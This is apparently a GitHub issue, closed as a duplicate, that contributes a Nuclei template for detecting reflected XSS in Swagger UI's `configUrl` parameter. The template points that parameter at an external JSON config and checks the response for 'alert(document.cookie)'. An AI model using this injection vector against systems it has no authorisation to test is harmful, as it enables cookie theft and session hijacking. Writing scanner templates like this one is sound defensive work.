-
Notifications
You must be signed in to change notification settings - Fork 3.2k
Closed
Labels
duplicateThis issue or pull request already existsThis issue or pull request already existstemplate-contributionNuclei template contributionNuclei template contribution
Description
Is there an existing template for this?
- I have searched the existing templates.
Nuclei Template
id: xss-vulnerability-configurl
info:
name: XSS in configUrl Parameter
author: 0xr2r
severity: high
description: |
Detects a reflected XSS vulnerability in the `configUrl` parameter in the `/docs/` endpoint. Exploiting this can lead to session hijacking if the cookies are not secured.
tags: xss,reflection
http:
- method: GET
path:
- "{{BaseURL}}/docs/?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/2a7c2ded36a37a8bd43145354c566bd2ec753156/config.json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "alert(document.cookie)"
- type: word
part: header
words:
- "text/html"Relevant dumped responses
https://www.rescana.com/post/swagger-ui-1-0-3-remote-cross-site-scripting-xss-vulnerability-comprehensive-analysis-exploitati
https://medium.com/@eabubakr21/exploiting-xss-in-swagger-ui-turning-apis-into-xss-playground-47ece3069d24
https://www.exploit-db.com/exploits/52392Anything else?
No response
Metadata
Metadata
Assignees
Labels
duplicateThis issue or pull request already existsThis issue or pull request already existstemplate-contributionNuclei template contributionNuclei template contribution